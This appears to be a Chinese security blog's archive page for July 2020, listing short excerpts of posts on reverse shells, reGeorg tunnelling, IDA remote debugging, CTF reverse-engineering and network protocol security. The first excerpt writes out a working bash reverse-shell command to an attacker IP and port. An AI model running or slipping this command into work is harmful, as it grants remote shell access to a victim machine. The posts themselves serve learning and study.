07 2020 档案
摘要:#反弹shell命令解析 攻击者在机器上监听相应端口,在受害者机器执行反弹shell命令,然后get shell。 bash -i >&/dev/tcp/192.168.190.138/6666 0>&1 ##bash -i 启动一个交互式shell 交互式shell的意思就是跟用户交互,你输入一行
阅读全文
摘要:#Regeorg+Proifier 参考链接https://www.freebuf.com/articles/network/208221.html Windows reGeorg+proxifier 正向代理 环境 攻击端(Win10):192.168.223.1 靶机一(Win2008):外网I
阅读全文
摘要:#环境配置 首先打开IDA 7.0\dbgsrv 此路径下为针对不同系统的调试文件,将对应的文件拷贝到要调试的系统中并运行,默认会监听23946端口。 起一下调试文件 打开IDA 选择Debug->RemoteWindowsDebug #窗口 跑了一个简单程序 F5看下伪代码 窗口输入123 双击&
阅读全文
摘要:#端口 首先要理解端口(port)的概念。端口是一种抽象的软件结构,包括一些数据结构和I/O缓冲。 进程通过系统调用与端口建立连接(binding),之后传输层传给该端口的数据都被相应进程所接收,而相应进程发给传输层的数据也通过该端口。端口操作类似于一般的I/O操作,进程获取一个端口,相当于获取本地
阅读全文
摘要:#Reverse IDA使用指令 链接 ##内涵 0707 直接拖进IDA看到疑似flag,按A可以转中文 A ASCII解析成ASCII ##[BJDCTF 2nd]guessgame 拖进IDA 发现flag ##xor 拖进IDA int __cdecl main(int argc, cons
阅读全文
摘要:#从ICMP协议开始 参考链接 https://www.cnblogs.com/bjlhx/p/10985384.html 一个新搭建好的网络,往往需要先进行一个简单的测试,来验证网络是否畅通;但是IP协议并不提供可靠传输。如果丢包了,IP协议并不能通知传输层是否丢包以及丢包的原因。 所以我们就需要
阅读全文
摘要:#从IP协议安全开始 ##IP数据包 IP协议 IP包在网络层 不保证可靠性 数据包可能重复、丢失,是无连接协议 首先要看TCP/IP协议,涉及到四层:链路层,网络层,传输层,应用层。 其中以太网(Ethernet)的数据帧在链路层 Frame是链路层的基本单元,包含链路层的头部信息(mac地址)和
阅读全文
摘要:#关于Ripple20 国外安全研究人员在由Treck开发的TCP/IP协议栈中发现了多个漏洞,这一系列漏洞统称为Ripple20。这些漏洞广泛存在于嵌入式和物联网设备中,影响了多个行业领域(包括医疗、运输、能源、电信、工业控制、零售和商业等),涉及了众多供应商(包括HP、Schneider Ele
阅读全文